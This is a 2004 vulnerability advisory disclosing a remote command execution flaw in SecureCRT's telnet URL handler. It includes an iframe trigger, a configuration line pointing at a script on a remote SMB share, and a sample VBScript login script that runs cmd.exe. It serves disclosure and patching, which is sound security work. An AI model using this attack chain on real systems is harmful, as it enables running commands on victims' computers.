======================================================================== = SecureCRT - Remote Command Execution = = Vendor Update: = http://www.vandyke.com/download/securecrt/index.html = = Affected Software: = SecureCRT V4.1, V4.0 (and probably lower) = = Public disclosure on November 23, 2004 ======================================================================== == Overview == In this time of responsible vulnerability disclosure, it's a little disturbing when a vendor acts on disclosed information but gives no recognition or even notification that an update has been created due to the information passed to them. This advisory is a little late, the update was posted to the vendor website last month. The only reason I know this, is because I asked and received a response. ------------------------------------------------------------------------ Brett, SecureCRT version 4.1.9 was released on Oct. 26, and is available for public download at the following location: http://www.vandyke.com/download/securecrt/index.html My apologies for not sending a special notice to you upon release. It was something that slipped off my radar. If you have any questions, please let us know. Thanks, Jake Devenport ------------------------------------------------------------------------ But enough of that, we know the game and still choose to play. SecureCRT installs a URL PROTOCOL handler into the registry, as "C:\Program Files\SecureCRT\SecureCRT.EXE" %1 This allows a user to click on a telnet:// link and have it opened from within their web browser. This 'telnet execution' can be automated through an html page such as <iframe src="telnet://192.168.0.1:25";> SecureCRT will accept a command line option (/F) to specify the directory to use as the configuration folder. It is possible by crafting a special URL to specify this directory through the html page. An attacker can specify a directory accessible through unprotected SMB share, therefore allowing them to control the configuration of secureCRT. SecureCRT allows for 'scripting' using script languages such as vbscript and has the ability to create a logon script. An attacker can therefore create a script to execute commands and have these commands executed on the targets computer. == Exploitation == There appears to be some filtering around the use of \ in the url->command line parsing, that appeared to prevent the specification of an SMB share to use for the configuration. This can be easily bypassed and leads to the loading of a configuration file from a remote site. The configuration file contains an entry that specifies the login script to run which can be set a file on the the remote share; S:"Script Filename"=\\ipofshare\share\folder\scriptname And the login script can then contain scripting such as; # $language = "VBScript" # $interface = "1.0" Sub Main dim wshShell, boolErr, strErrDesc Set wshShell = CreateObject("WScript.Shell") run = wshShell.Run ("cmd.exe /c dir >c:\shell.txt",0,True) End Sub == Solutions == - Install the vendor supplied patch. == Credit == Discovered and advised to vandyke.com August 24, 2004 by Brett Moore of Security-Assessment.com == About Security-Assessment.com == Security-Assessment.com is a leader in intrusion testing and security code review, and leads the world with SA-ISO, online ISO17799 compliance management solution. Security-Assessment.com is committed to security research and development, and its team have previously identified a number of vulnerabilities in public and private software vendors products. ###################################################################### CONFIDENTIALITY NOTICE: This message and any attachment(s) are confidential and proprietary. They may also be privileged or otherwise protected from disclosure. If you are not the intended recipient, advise the sender and delete this message and any attachment from your system. If you are not the intended recipient, you are not authorised to use or copy this message or attachment or disclose the contents to any other person. Views expressed are not necessarily endorsed by Security-Assessment.com Limited. Please note that this communication does not designate an information system for the purposes of the New Zealand Electronic Transactions Act 2003. ######################################################################
